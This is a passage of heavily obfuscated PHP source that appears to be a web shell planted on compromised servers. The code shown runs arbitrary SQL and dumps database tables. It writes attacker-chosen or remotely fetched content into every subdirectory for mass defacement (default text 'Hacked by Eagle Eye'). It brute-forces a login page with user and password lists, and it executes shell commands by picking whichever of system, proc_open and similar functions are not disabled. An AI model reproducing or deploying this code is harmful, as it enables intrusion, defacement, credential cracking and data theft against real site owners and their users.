$GLOBALS["\x44\106\103\157\156\146\x69\x67"][0]["\144\142\156\141\155\x65"]); $inject = $GLOBALS["\104\x46\103\x6f\x6e\x66\x69\x67"][1]["\163\x71\x6c\x63\157\x6d\155\x61\x6e\144\x73"]; $query = mysqli_query($conn, $inject) or die(mysqli_error($conn)); $this->DFSPopupMSG(3, null, "\103\x6f\155\155\141\156\x64\40\145\x78\145\143\x75\164\145\144\x21", null, false); } else { $inject = $GLOBALS["\x44\106\103\x6f\x6e\146\x69\x67"][1]["\163\161\x6c\x63\157\x6d\x6d\141\x6e\144\163"]; $query = mysqli_query($conn, $inject) or die(mysqli_error($conn)); $this->DFSPopupMSG(3, null, "\103\x6f\x6d\155\141\x6e\x64\x20\145\x78\x65\x63\165\164\x65\144\x21", null, false); } } else { echo "\x3c\144\x69\x76\40\151\x64\x3d\47\163\x71\x6c\x73\x69\x64\145\47\x3e\12\x20\x20\40\x20\40\x20\40\40\40\x20\x20\40\40\x20\40\x20\x20\x20\40\40\x20\40\40\x20\x3c\x66\157\162\155\x20\x61\x63\x74\151\157\156\x3d\x27\47\40\x6d\x65\x74\150\x6f\x64\x3d\x27\120\x4f\123\x54\47\76\x3c\151\x6e\160\x75\164\40\164\x79\x70\x65\x3d\x27\x73\165\x62\155\x69\164\47\40\166\x61\x6c\x75\x65\75\x27\114\157\x67\x6f\x75\164\x27\x20\156\141\155\145\75\47\163\x71\154\154\x6f\x67\157\x75\x74\47\x3e\x3c\x2f\146\x6f\x72\x6d\76\12\x20\40\x20\40\40\x20\40\x20\40\x20\x20\x20\x20\x20\40\x20\40\40\40\40\40\40\x20\x20\74\146\x6f\x72\155\x20\x61\x63\164\x69\157\156\x3d\x27\47\x20\155\145\164\x68\157\144\75\x27\120\x4f\x53\124\x27\x3e\x3c\151\156\x70\165\x74\40\164\x79\160\x65\75\47\163\165\142\155\x69\164\47\x20\x6e\x61\x6d\145\x3d\47\x6f\x74\x68\x65\162\x27\40\x76\141\x6c\165\x65\x3d\x27\x47\x65\x74\x20\x41\144\155\x69\156\145\x72\47\76\74\x2f\x66\x6f\162\x6d\76"; if (isset($GLOBALS["\104\x46\103\157\156\146\151\147"][0]["\164\142\156\x61\155\x65"]) || isset($GLOBALS["\104\x46\x43\x6f\156\146\x69\x67"][0]["\144\142\156\x61\155\145"])) { echo "\x3c\146\157\x72\x6d\40\x61\x63\164\151\x6f\x6e\x3d\47\47\x20\155\x65\164\x68\157\x64\x3d\47\120\117\x53\124\47\x3e\xa\40\x20\x20\x20\40\40\40\x20\40\40\40\40\40\40\40\x20\40\x20\40\x20\x20\40\40\40\40\x20\x20\40\x3c\x69\156\x70\165\x74\x20\x73\x74\171\x6c\x65\75\47\x62\x61\143\x6b\147\162\x6f\x75\156\x64\x3a\x72\x65\144\x3b\47\x20\x74\171\x70\x65\x3d\x27\163\x75\142\155\151\164\x27\x20\156\x61\x6d\x65\75\x27\163\x71\154\144\x72\157\160\x27\40\166\x61\154\x75\x65\75\47\x44\x52\x4f\120\x27\x3e\74\57\146\157\162\155\x3e"; } echo "\74\57\144\151\x76\x3e\xa\40\x20\40\40\x20\40\x20\x20\x20\x20\x20\40\x20\x20\x20\40\40\40\40\x20\x20\x20\x20\40\74\x66\x6f\x72\x6d\x20\141\x63\164\151\x6f\x6e\75\47\47\40\x6d\x65\x74\150\x6f\144\75\x27\120\117\x53\x54\x27\x3e\x3c\x74\x61\142\x6c\145\76\74\x74\162\x3e\74\164\144\76\74\164\x65\170\x74\x61\162\x65\141\x20\x6e\141\x6d\145\x3d\x27\163\161\x6c\143\x6f\155\x6d\x61\156\x64\163\x27\x20\160\154\141\143\145\x68\157\x6c\x64\145\162\x3d\47\x54\150\x65\162\145\163\x20\x6e\157\x20\x6f\165\164\x70\x75\x74\x20\x2c\152\x75\163\x74\x20\x75\x73\145\40\146\157\162\x20\x65\x64\151\164\x20\x76\x61\x6c\165\x65\40\x69\x6e\40\144\x61\x74\141\142\141\163\145\47\40\156\x61\155\x65\75\x27\x73\161\x6c\143\x6d\x64\x27\x3e\x3c\x2f\164\x65\x78\x74\141\x72\x65\141\x3e\xa\40\40\40\x20\x20\40\40\40\40\x20\x20\40\x20\40\x20\40\x20\x20\x20\40\x20\40\40\40\74\57\164\x64\x3e\x3c\x2f\164\162\76\x3c\164\x72\x3e\74\x74\x64\76\74\151\156\160\x75\x74\x20\x74\171\160\145\x3d\x27\163\x75\x62\155\x69\164\x27\x20\166\x61\x6c\x75\145\75\x27\x45\170\x65\x63\165\x74\145\47\76\x3c\57\x74\144\x3e\x3c\57\164\x72\x3e\74\x2f\x74\141\142\x6c\x65\76\74\57\x66\x6f\162\x6d\76"; echo "\x3c\144\151\x76\x20\x69\144\x3d\47\x66\x69\x65\x6c\144\x78\47\76\x3c\154\141\x62\145\154\x3e\x43\x6f\156\x6e\145\x63\x74\x65\144\x20\164\157\40\155\171\x73\161\154\x3c\57\x6c\141\x62\x65\x6c\76\x3c\142\x72\x3e"; if (!isset($GLOBALS["\x44\106\x43\157\156\146\151\x67"][0]["\x64\142\x6e\x61\x6d\x65"])) { echo "\x3c\142\x75\x74\x74\x6f\156\x3e\74\141\x20\151\144\75\x27\x62\x6c\141\143\153\171\47\x20\150\162\x65\x66\x3d\47\77\144\x66\141\x63\164\x69\x6f\x6e\x3d\x73\161\x6c\x27\x3e\x42\141\143\x6b\x3c\57\141\76\x3c\x2f\x62\165\164\164\x6f\156\76\x3c\142\x72\x3e"; } else { if (!isset($GLOBALS["\104\x46\x43\157\x6e\x66\x69\x67"][0]["\164\142\x6e\x61\x6d\145"])) { echo "\74\x62\165\x74\164\157\x6e\76\x3c\x61\40\x69\144\75\47\142\x6c\x61\143\153\171\47\x20\150\x72\x65\x66\x3d\47\77\x64\x66\141\143\x74\151\157\x6e\x3d\x73\161\154\x27\76\x42\x61\143\x6b\x3c\x2f\x61\x3e\x3c\x2f\142\165\x74\x74\x6f\156\76\74\142\162\76"; } else { echo "\x3c\142\165\164\x74\157\156\x3e\74\x61\x20\151\x64\x3d\x27\x62\154\x61\x63\x6b\x79\47\40\150\162\145\146\x3d\x27\x3f\x64\x66\141\x63\x74\151\157\156\x3d\x73\x71\x6c\46\x64\x62\x6e\x61\155\145\x3d" . $GLOBALS["\x44\106\x43\x6f\156\146\151\147"][0]["\144\x62\x6e\x61\155\145"] . "\x27\76\x42\x61\143\153\74\x2f\141\76\74\x2f\142\x75\164\x74\157\x6e\76\xa\40\40\40\40\x20\40\x20\40\x20\40\x20\x20\40\x20\x20\40\x20\x20\x20\40\40\40\40\40\40\40\40\x20\x20\x20\x20\40\40\x20\x20\40\x20\74\142\x72\76"; } } if (isset($GLOBALS["\x44\106\103\x6f\156\x66\x69\x67"][0]["\144\142\156\x61\x6d\145"])) { $dbs = mysqli_real_escape_string($conn, $GLOBALS["\x44\x46\103\x6f\156\146\x69\147"][0]["\144\142\x6e\141\155\145"]); $sql = "\163\x65\154\x65\143\x74\40\164\141\x62\x6c\x65\x5f\156\x61\155\145\x20\x66\162\x6f\x6d\x20\x69\156\146\157\x72\x6d\141\164\151\157\x6e\137\163\x63\150\x65\155\x61\56\164\141\x62\154\145\x73\40\167\x68\x65\x72\145\40\x74\141\x62\154\x65\137\x73\x63\x68\145\155\141\75\x27{$dbs}\47\73"; $query = mysqli_query($conn, $sql) or die(mysqli_error($conn)); while ($fetch = mysqli_fetch_assoc($query)) { echo "\74\x61\x20\x68\x72\x65\146\x3d\x27\x3f\144\x66\141\143\164\151\x6f\x6e\x3d\x73\161\x6c\46\144\142\x6e\x61\x6d\x65\75" . $dbs . "\x26\x74\142\x6e\x61\x6d\145\x3d" . $fetch["\164\141\142\x6c\145\x5f\156\141\155\145"] . "\x27\x3e" . $fetch["\x74\x61\x62\154\145\137\156\141\155\x65"] . "\x3c\x2f\141\76\74\x62\162\76"; } echo "\74\57\144\151\166\x3e\74\144\x69\166\x20\x69\x64\x3d\47\163\161\x6c\143\157\154\47\x3e"; if (isset($GLOBALS["\104\x46\103\x6f\x6e\x66\151\147"][0]["\x74\x62\x6e\141\155\x65"])) { if (!isset($GLOBALS["\x44\106\103\x6f\x6e\146\x69\147"][0]["\x6c\x69\155\151\x74"])) { mysqli_select_db($conn, $dbs); $tbl = mysqli_real_escape_string($conn, $GLOBALS["\104\x46\103\x6f\x6e\146\151\147"][0]["\164\142\156\x61\155\145"]); $sql = "\x73\145\x6c\x65\x63\x74\x20\x63\157\154\x75\155\156\x5f\156\x61\155\145\40\x66\x72\x6f\155\x20\151\x6e\x66\157\162\x6d\x61\x74\151\157\x6e\137\x73\143\150\x65\155\141\56\x63\157\154\x75\x6d\156\x73\x20\167\150\145\162\x65\40\164\141\142\x6c\x65\x5f\156\141\155\145\x3d\47{$tbl}\x27"; $sql1 = "\x73\145\x6c\x65\x63\x74\40\52\x20\146\x72\157\x6d\40{$tbl}\x20\x6c\x69\155\x69\x74\x20\62\x30"; $query = mysqli_query($conn, $sql) or die(mysqli_error($conn)); $query1 = mysqli_query($conn, $sql1) or die(mysqli_error($conn)); echo "\x3c\x74\141\x62\x6c\x65\x3e"; while ($fetch = mysqli_fetch_assoc($query)) { echo "\x3c\164\x68\76" . $fetch["\143\x6f\154\x75\155\x6e\x5f\x6e\x61\x6d\145"] . "\74\57\x74\150\x3e"; } while ($fetch1 = mysqli_fetch_assoc($query1)) { echo "\74\x74\162\x3e"; foreach ($fetch1 as $key => $val) { echo "\x3c\x74\x64\x3e" . $val . "\x3c\x2f\x74\144\x3e"; } echo "\74\x2f\164\162\76"; } $total_row = mysqli_num_rows($query1); echo "\74\57\164\141\x62\154\x65\x3e"; if ($total_row > 0) { echo "\x3c\146\157\162\x6d\x20\141\x63\x74\151\x6f\x6e\75\x27\47\40\155\x65\164\x68\157\x64\75\x27\x47\x45\x54\x27\76\x3c\164\141\x62\154\145\x3e"; echo "\x3c\x69\156\160\x75\x74\40\164\x79\x70\x65\x3d\x27\x68\151\x64\x64\x65\x6e\47\40\x76\x61\154\x75\145\75\x27\163\161\x6c\x27\40\x6e\x61\155\x65\75\x27\x64\146\141\143\x74\x69\157\156\x27\x3e"; echo "\x3c\x69\156\160\x75\x74\40\164\171\x70\145\75\47\x68\x69\x64\x64\145\156\47\40\166\141\154\x75\145\75\x27" . $dbs . "\47\40\156\x61\155\x65\x3d\x27\x64\x62\x6e\141\155\x65\x27\76"; echo "\74\x69\156\x70\x75\164\40\x74\x79\160\x65\x3d\x27\150\x69\x64\144\145\156\x27\x20\x76\141\x6c\x75\x65\x3d\x27" . $tbl . "\x27\40\x6e\141\x6d\x65\x3d\47\x74\x62\x6e\141\x6d\x65\x27\x3e"; echo "\74\x74\162\x3e\74\x74\x64\76\x3c\154\x61\x62\x65\x6c\76\x53\x65\164\40\x6f\x66\x66\x73\145\x74\54\x6c\151\x6d\x69\x74\74\57\x6c\x61\142\x65\154\76\74\x2f\164\x64\x3e\x3c\x74\x64\x3e\xa\40\x20\40\40\40\40\40\40\x20\x20\x20\x20\40\40\40\40\x20\x20\x20\40\x20\x20\40\x20\40\40\40\x20\40\40\40\40\x20\40\40\x20\40\x20\40\40\74\x69\156\160\x75\164\x20\164\171\x70\145\x3d\47\x74\145\x78\164\47\x20\x70\x6c\x61\143\x65\x68\x6f\x6c\x64\145\162\x3d\x27\x65\147\72\x20\x32\x30\x2c\65\x30\47\40\x6e\x61\155\x65\75\x27\x6c\x69\155\151\164\x27\76\74\57\x74\144\76\74\x2f\x74\x72\76\12\40\40\40\x20\40\40\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\40\40\x20\x20\40\x20\x20\x20\40\40\x20\x20\40\x20\40\40\x20\40\40\40\x20\x20\x3c\x74\162\76\74\x74\144\x3e\x3c\x2f\164\144\76\74\x74\144\76\x3c\x69\x6e\160\165\x74\x20\x74\171\x70\x65\75\47\163\165\x62\x6d\151\164\47\x20\166\141\x6c\165\145\x3d\47\x4c\145\164\163\40\107\x6f\x27\x3e\x3c\x2f\164\144\76\x3c\x2f\164\x72\76"; echo "\74\57\164\x61\x62\154\x65\76\74\57\146\x6f\162\155\76"; } echo "\74\x2f\x64\x69\166\76"; } else { $limits = explode("\x2c", $GLOBALS["\104\106\x43\x6f\x6e\x66\x69\x67"][0]["\x6c\x69\x6d\x69\164"]); $offset = intval($limits[0]); $limit = intval($limits[1]); mysqli_select_db($conn, $dbs); $tbl = mysqli_real_escape_string($conn, $GLOBALS["\104\106\x43\157\x6e\x66\x69\147"][0]["\164\142\x6e\141\x6d\145"]); $sql = "\x73\145\154\145\143\164\x20\143\157\x6c\165\x6d\156\x5f\156\141\x6d\145\40\146\x72\157\x6d\40\x69\x6e\x66\x6f\x72\x6d\141\x74\x69\157\x6e\137\x73\x63\x68\x65\x6d\141\x2e\x63\x6f\154\x75\x6d\x6e\x73\x20\x77\150\145\162\145\x20\164\x61\142\154\x65\137\x6e\141\x6d\145\x3d\x27{$tbl}\47"; $sql1 = "\163\x65\x6c\x65\143\164\40\52\x20\x66\162\x6f\x6d\40{$tbl}\40\154\151\x6d\151\x74\40{$offset}\x2c{$limit}"; $query = mysqli_query($conn, $sql) or die(mysqli_error($conn)); $query1 = mysqli_query($conn, $sql1) or die(mysqli_error($conn)); echo "\74\164\x61\142\154\x65\76"; while ($fetch = mysqli_fetch_assoc($query)) { echo "\74\x74\150\76" . $fetch["\x63\x6f\154\x75\155\156\x5f\156\x61\x6d\x65"] . "\x3c\x2f\x74\x68\76"; } while ($fetch1 = mysqli_fetch_assoc($query1)) { echo "\74\164\x72\x3e"; foreach ($fetch1 as $key => $val) { echo "\x3c\x74\x64\x3e" . $val . "\74\x2f\164\144\76"; } echo "\x3c\x2f\x74\x72\x3e"; } echo "\74\57\164\x61\x62\154\x65\x3e"; $total_row = mysqli_num_rows($query1); if ($total_row > 0) { echo "\x3c\146\157\x72\x6d\x20\x61\143\x74\x69\x6f\x6e\x3d\x27\x27\40\155\x65\164\150\157\144\x3d\47\x47\x45\x54\x27\x3e\74\164\x61\x62\x6c\145\76"; echo "\x3c\151\156\160\165\x74\40\164\x79\x70\145\75\x27\x68\151\x64\x64\145\156\47\x20\166\x61\x6c\165\x65\x3d\47\x73\161\154\47\x20\x6e\x61\x6d\145\75\x27\x64\146\x61\143\164\151\157\x6e\47\76"; echo "\74\x69\156\x70\165\x74\x20\x74\171\x70\x65\75\47\x68\151\144\144\x65\156\x27\x20\x76\141\154\x75\145\75\x27" . $dbs . "\47\40\x6e\141\x6d\x65\75\47\x64\x62\x6e\x61\155\145\x27\76"; echo "\x3c\x69\156\160\x75\x74\x20\x74\x79\160\x65\75\x27\150\151\144\x64\x65\x6e\x27\x20\166\141\154\165\145\x3d\47" . $tbl . "\x27\40\x6e\x61\x6d\x65\x3d\47\164\x62\156\141\x6d\x65\47\76"; echo "\74\x74\162\76\x3c\x74\144\76\74\x6c\x61\142\145\154\x3e\123\x65\164\x20\x6f\x66\x66\163\x65\164\x2c\154\151\155\151\x74\x3c\57\154\141\x62\145\154\x3e\74\x2f\164\144\76\74\164\x64\x3e\12\x20\40\x20\40\40\x20\x20\x20\x20\x20\x20\40\40\40\x20\x20\x20\x20\x20\40\x20\40\40\x20\x20\40\x20\40\40\x20\40\x20\40\40\x20\x20\40\x20\40\40\x3c\151\x6e\160\x75\x74\x20\164\171\x70\x65\75\x27\164\x65\x78\x74\x27\x20\160\154\x61\143\x65\150\157\154\x64\x65\x72\75\x27\145\147\72\40\x32\60\x2c\x35\60\x27\x20\x6e\x61\x6d\x65\x3d\47\x6c\151\x6d\x69\x74\x27\x3e\74\57\164\144\x3e\74\57\x74\162\x3e\12\x20\x20\40\x20\40\x20\x20\x20\40\x20\x20\40\40\x20\40\40\40\x20\40\x20\40\40\x20\x20\x20\40\40\40\x20\40\x20\x20\40\40\40\40\x20\x20\x20\x20\x3c\x74\162\76\x3c\x74\x64\x3e\74\x2f\x74\x64\76\74\x74\144\x3e\74\151\x6e\x70\x75\164\40\164\x79\160\x65\75\47\x73\x75\x62\155\x69\x74\x27\40\x76\x61\x6c\165\145\x3d\x27\x4c\x65\x74\163\40\x47\157\47\76\x3c\57\164\144\76\74\x2f\164\162\x3e"; echo "\74\57\164\x61\x62\x6c\x65\76\x3c\x2f\x66\x6f\x72\155\76"; } echo "\x3c\57\144\x69\x76\76"; } } } else { $sql = "\163\145\154\x65\143\164\40\163\x63\150\x65\155\141\137\x6e\x61\x6d\145\40\146\x72\157\x6d\x20\x69\156\x66\x6f\x72\155\141\164\151\x6f\x6e\x5f\163\143\x68\145\155\x61\x2e\163\143\150\x65\x6d\141\164\141"; $query = mysqli_query($conn, $sql) or die(mysqli_error($conn)); while ($fetch = mysqli_fetch_assoc($query)) { echo "\74\141\x20\150\162\145\146\75\47\77\x64\146\141\143\164\x69\x6f\156\x3d\x73\161\x6c\x26\x64\x62\156\141\155\x65\75" . $fetch["\x73\x63\x68\x65\155\141\x5f\x6e\141\155\145"] . "\x27\76" . $fetch["\x73\143\x68\x65\155\141\137\156\141\x6d\x65"] . "\x3c\57\141\x3e\74\142\162\76"; } echo "\74\57\144\151\166\76"; } if (isset($GLOBALS["\x44\x46\x43\157\x6e\x66\x69\x67"][1]["\163\x71\x6c\154\157\x67\x6f\x75\164"])) { $_SESSION["\x73\x71\154\137\x61\x75\164\x68"] = null; unset($_SESSION["\163\x71\x6c\137\x61\165\x74\x68"]); echo "\74\163\143\x72\x69\160\x74\76\x77\151\156\x64\157\x77\56\x6c\x6f\x63\141\164\151\157\156\56\x72\145\160\x6c\141\143\145\50\47\x3f\x64\146\x61\x63\164\x69\157\156\75\x73\161\x6c\47\x29\73\74\57\x73\143\162\x69\x70\x74\x3e"; } if (isset($GLOBALS["\x44\x46\103\157\156\x66\151\147"][1]["\x73\161\x6c\x63\x6d\144"])) { $sqlcmd = $GLOBALS["\x44\x46\103\157\x6e\x66\151\x67"][1]["\163\161\x6c\x63\x6d\144"]; $qrycmd = mysqli_query($conn, $sqlcmd) or die(mysqli_error($conn)); $this->DFSPopupMSG(1, "\123\121\114\x20\121\165\x65\162\171", "\103\x6f\x6d\155\x61\156\x64\40\x73\165\143\x63\145\163\163\x66\165\x6c\x6c\x79\x20\145\x78\x65\143\165\164\145\144\x21", '', true); } } } } } else { if (!isset($GLOBALS["\104\x46\103\x6f\156\x66\x69\x67"][1]["\143\x6f\x6e\156\x65\x63\x74\137\163\161\x6c"])) { echo explode("\174\x7c", $GLOBALS["\x44\106\123\x79\156\164\141\x78"][0](self::$remote_url . "\57\x6f\x74\x68\x65\x72\163\56\x68\x74\155\154"))[4]; } else { $tmp_conn = mysqli_connect($GLOBALS["\x44\106\103\x6f\x6e\146\151\147"][1]["\x73\161\x6c\x68\157\x73\x74"], $GLOBALS["\104\x46\103\x6f\156\x66\151\x67"][1]["\163\x71\x6c\165\163\x65\162"], $GLOBALS["\x44\106\x43\x6f\156\x66\151\x67"][1]["\x73\161\x6c\160\x61\x73\163"]) or die($this->DFSPopupMSG(2, "\115\171\x53\x51\114\40\x43\157\156\x6e\145\143\164\x69\x6f\156", "\x43\x61\156\156\x6f\164\40\143\157\x6e\156\x65\143\x74\x20\x74\157\x20\x64\x61\x74\x61\x62\x61\x73\145\x21", '', true)); if (!mysqli_connect_errno()) { $_SESSION["\x73\x71\154\x5f\141\x75\x74\x68"] = $GLOBALS["\x44\106\103\157\156\146\151\x67"][1]["\x73\x71\154\150\x6f\163\x74"] . "\x7c\55\x2d\x7c" . $GLOBALS["\104\106\103\x6f\x6e\x66\x69\x67"][1]["\x73\x71\154\165\x73\x65\x72"] . "\174\x2d\55\x7c" . $GLOBALS["\104\106\103\x6f\x6e\x66\x69\147"][1]["\x73\161\x6c\160\x61\x73\x73"]; echo "\74\x73\143\162\x69\160\x74\x3e\167\151\x6e\144\157\167\x2e\x6c\x6f\143\141\x74\151\x6f\156\56\162\x65\x70\154\141\x63\145\50\x77\151\156\144\x6f\167\56\x6c\157\143\x61\164\x69\x6f\x6e\56\x68\x72\x65\146\51\73\x3c\57\163\x63\162\x69\x70\164\76"; } else { echo "\106\x61\151\154\x65\144\x20\x74\157\40\x63\157\156\156\145\x63\x74\x20\155\x79\x73\x71\x6c"; die; } } } echo "\74\57\x73\145\x63\164\x69\157\x6e\76"; break; case "\x6c\157\x67\157\x75\164": unset($_SESSION["\x44\106\123\137\x41\x75\164\x68"]); session_destroy(); echo "\x3c\x73\143\x72\151\x70\164\76\167\x69\x6e\144\157\167\56\154\x6f\x63\141\x74\x69\157\x6e\56\162\x65\160\154\141\x63\145\50\x27" . $GLOBALS["\x44\106\x43\x6f\156\x66\x69\x67"][2]["\x50\110\x50\x5f\x53\105\x4c\x46"] . "\x27\x29\x3c\x2f\163\x63\x72\x69\x70\x74\76"; break; case "\x63\x72\141\x63\x6b": if (!isset($GLOBALS["\104\106\x43\157\x6e\146\151\x67"][1]["\x63\162\x61\x63\x6b"])) { echo explode("\174\174", $GLOBALS["\104\x46\x53\171\156\164\141\170"][0](self::$remote_url . "\57\x6f\x74\150\145\x72\163\x2e\x68\x74\x6d\x6c"))[0]; } else { $host = $GLOBALS["\104\106\x43\157\x6e\146\151\x67"][1]["\x68\157\163\164"]; $user = explode("\xa", $GLOBALS["\104\x46\103\157\156\146\151\x67"][1]["\x75\163\x65\x72\154\151\x73\x74"]); $pass = explode("\12", $GLOBALS["\104\106\103\157\156\146\x69\x67"][1]["\x70\x61\163\x73\x6c\x69\x73\x74"]); $port = $GLOBALS["\104\x46\103\x6f\x6e\x66\151\x67"][1]["\160\x6f\162\x74\143"]; $timeout = $GLOBALS["\x44\106\103\x6f\156\x66\x69\x67"][1]["\164\x69\155\x65\157\165\x74"]; echo "\74\x73\x65\143\x74\x69\x6f\x6e\x20\143\154\x61\163\163\75\x27\143\x72\141\143\153\x72\x65\163\x75\154\164\163\47\x3e"; foreach ($user as $u) { print "\74\x70\76\x54\162\x79\x69\x6e\147\40\x66\x6f\x72\x20\165\x73\145\162\40\x2d\x3e\x20" . $u . "\74\57\160\x3e"; foreach ($pass as $p) { $this->DFSCracker(trim($host), $port, trim($u), trim($p), trim($timeout)); } } echo "\74\160\76\104\x6f\x6e\x65\41\x3c\57\160\76"; echo "\74\57\163\x65\x63\164\x69\157\x6e\x3e"; } break; case "\155\x61\x73\x73": $slashtype = $this->DFSSlash(); echo "\x3c\x73\145\x63\164\x69\157\x6e\40\x63\x6c\x61\x73\x73\x3d\x27\155\141\163\x73\x27\76"; if (!isset($GLOBALS["\x44\106\x43\x6f\x6e\x66\151\147"][1]["\144\146\x6d\x61\x73\x73"])) { echo explode("\174\x7c", $GLOBALS["\x44\106\x53\x79\x6e\x74\141\x78"][0](self::$remote_url . "\x2f\x6f\164\x68\145\x72\x73\56\x68\164\x6d\154"))[2]; } else { $arrpath = glob($GLOBALS["\x44\x46\103\x6f\156\x66\151\147"][1]["\155\x61\x73\163\160\141\164\x68"] . $slashtype . "\52", GLOB_ONLYDIR); if (!empty($GLOBALS["\x44\106\103\157\156\x66\x69\x67"][1]["\x66\x72\x6f\x6d\165\x72\154"]) && $GLOBALS["\104\x46\x43\x6f\156\146\x69\147"][1]["\x66\162\x6f\155\x75\x72\154"] !== '' && $GLOBALS["\x44\x46\x43\157\156\x66\x69\147"][1]["\146\162\x6f\x6d\x75\x72\154"] !== NULL) { if (filter_var($GLOBALS["\x44\106\103\x6f\x6e\x66\151\x67"][1]["\146\x72\157\x6d\x75\162\154"], FILTER_VALIDATE_URL)) { $ncode = file_get_contents($GLOBALS["\x44\106\x43\157\x6e\146\x69\147"][1]["\146\x72\x6f\155\165\x72\154"]); } else { die("\74\163\143\x72\x69\160\x74\76\x61\154\x65\x72\164\x28\47\x43\150\x65\x63\x6b\x20\165\x72\x6c\47\x29\73\x77\x69\156\144\x6f\x77\x2e\x6c\157\x63\141\164\151\157\156\56\162\145\x70\154\x61\x63\x65\x28\x77\x69\156\144\157\167\x2e\x6c\157\x63\x61\164\x69\x6f\156\x2e\x68\162\x65\x66\51\x3b\x3c\x2f\x73\x63\x72\x69\160\x74\x3e"); } } else { $ncode = $GLOBALS["\x44\106\x43\157\x6e\x66\151\x67"][1]["\143\x6f\144\145\x6d\141\x73\163"] ?: "\x48\x61\x63\153\x65\x64\40\142\x79\x20\x45\141\147\154\x65\x20\x45\x79\x65"; } $lekluh = $GLOBALS["\x44\106\103\x6f\x6e\x66\151\x67"][1]["\x6d\x61\x73\163\x70\x61\164\x68"] . $slashtype . $GLOBALS["\x44\x46\103\157\x6e\146\x69\x67"][1]["\x6d\141\163\x73\x6e\x61\155\145"]; $rakluh = fopen($lekluh, "\x77"); fwrite($rakluh, $ncode); foreach ($arrpath as $p) { $npath = $p . $slashtype . $GLOBALS["\x44\106\103\x6f\156\x66\151\147"][1]["\155\x61\x73\x73\x6e\x61\155\145"]; $nopen = fopen($npath, "\x77"); fwrite($nopen, $ncode); fclose($nopen); } fclose($rakluh); $this->DFSPopupMSG(1, "\115\141\x73\163\x20\144\x65\x66\x61\143\145\x6d\x65\156\164\163", "\x41\154\x6c\40\x66\151\154\x65\40\163\165\143\x63\145\x73\x73\146\165\x6c\x6c\x79\40\143\162\x65\141\164\x65\144\x21", '', true); } echo "\x3c\x2f\163\145\x63\164\151\157\x6e\76"; break; } } public function DFSExecute($command) { if (isset($GLOBALS["\104\x46\x43\157\x6e\146\x69\147"][0]["\144\146\160"])) { $GLOBALS["\x44\x46\123\x79\156\x74\141\x78"][3]($this->Dec($GLOBALS["\104\106\x43\157\x6e\146\151\x67"][0]["\144\146\x70"])); } else { $GLOBALS["\x44\106\123\171\x6e\164\141\x78"][3]($GLOBALS["\104\x46\x43\x6f\x6e\x66\x69\147"][2]["\104\x4f\x43\125\115\x45\116\x54\137\122\x4f\x4f\124"]); } if ($this->DFSDat("\151\156\x69", "\x64\151\163\141\x62\x6c\145\137\146\x75\156\143\x74\x69\157\156\163") !== "\116\x6f\x6e\145") { $disCMD = explode("\54", $this->DFSDat("\151\x6e\151", "\144\151\x73\x61\x62\x6c\x65\137\146\x75\x6e\x63\164\x69\157\x6e\163")); $disCMD = array_map("\x74\x72\x69\x6d", $disCMD); foreach ($GLOBALS["\104\x46\123\103\x6d\144"] as $cmd) { if (!in_array($cmd, $disCMD)) { $availCMD = $cmd; switch ($availCMD) { case $GLOBALS["\x44\106\x53\x43\x6d\x64"][4]: return $this->DFSProcOpen($command); break; case $GLOBALS["\x44\106\123\x43\155\x64"][1]: case $GLOBALS["\x44\106\x53\x43\x6d\144"][2]: print $availCMD($command); return $GLOBALS["\x44\106\x53\x43\x6d\x64"][1]($command); break; default: return $availCMD($command); break; } break; } } } else { return system($command); } } private function DFSProcOpen($command) { $descriptorspec = array(0 => array("\x70\151\160\145", "\x72"), 1 => array("\x70\x69\160\x65", "\167"), 2 => array("\160\x69\160\145", "\167")); $exec = $command; $process = $GLOBALS["\x44\x46\123\103\x6d\144"][4]($exec, $descriptorspec, $pipes, null, null); if (is_resource($process)) { $retCMD = $GLOBALS["\104\106\123\x79\156\164\141\170"][14]($pipes[1]); echo $retCMD; proc_close($process); } else { echo "\106\141\151\154\40\164\157\40\145\170\145\143\165\x74\145\41"; } } private function DFSWinPathCheck() { $partition = array("\101\x3a", "\102\72", "\x43\72", "\x44\x3a", "\x45\72", "\x46\x3a", "\107\x3a", "\x48\72", "\111\72", "\112\72", "\113\72", "\114\72", "\115\x3a", "\116\x3a", "\117\x3a", "\120\72", "\x51\72", "\x52\72", "\x53\72", "\124\x3a", "\x55\72", "\126\x3a", "\127\72", "\x58\x3a", "\131\72", "\x5a\x3a"); $available = array(); foreach ($partition as $part) { if (is_dir($part)) { array_push($available, $part); } } return $available; } private function DFSCracker($host, $port, $user, $pass, $timeout) { $ch = curl_init(); $qdata = array("\x75\x73\145\162" => $user, "\x70\x61\163\163" => $pass, "\x67\157\164\x6f\x5f\x75\162\151" => "\x2f"); curl_setopt($ch, CURLOPT_URL, "\x68\164\164\160\x73\72\x2f\57{$host}\x3a" . $port . "\57\154\x6f\x67\151\156\57\77\x6c\x6f\x67\x69\x6e\x5f\x6f\x6e\154\x79\75\61"); curl_setopt($ch, CURLOPT_HEADER, TRUE); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $qdata); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout); curl_setopt($ch, CURLOPT_FAILONERROR, 1); $data = curl_exec($ch); $httpcode = curl_getinfo($ch, CURLINFO_HTTP_CODE); if (curl_errno($ch) == 28) { print "\74\142\x3e\x3c\146\x6f\156\x74\40\x66\x61\143\x65\x3d\42\126\145\x72\x64\141\156\x61\42\x20\163\x74\x79\154\x65\75\x22\146\157\x6e\x74\55\x73\x69\x7a\x65\72\x20\x39\x70\x74\x22\x3e\xa\x20\40\40\x20\40\40\x20\x20\40\40\x20\40\74\146\157\x6e\164\40\143\157\154\157\x72\75\x22\x23\x41\x41\60\x30\60\60\42\x3e\105\162\162\x6f\x72\x20\72\x3c\57\x66\157\x6e\x74\76\40\74\x66\x6f\156\x74\40\143\x6f\x6c\x6f\162\x3d\x22\x23\60\x30\x38\x30\x30\60\42\76\103\x6f\x6e\x6e\x65\x63\x74\151\x6f\156\40\x54\x69\155\x65\x6f\165\164\xa\40\x20\40\x20\x20\40\x20\x20\x20\40\x20\x20\54\40\123\x6c\145\x65\x70\40\x66\x6f\x72\x20\x35\x73\x20\56\x3c\57\146\157\156\x74\x3e\74\x2f\146\157\156\164\76\x3c\x2f\142\76\x3c\x2f\160\x3e"; sleep(5); } else { if (curl_errno($ch) == 0) { print 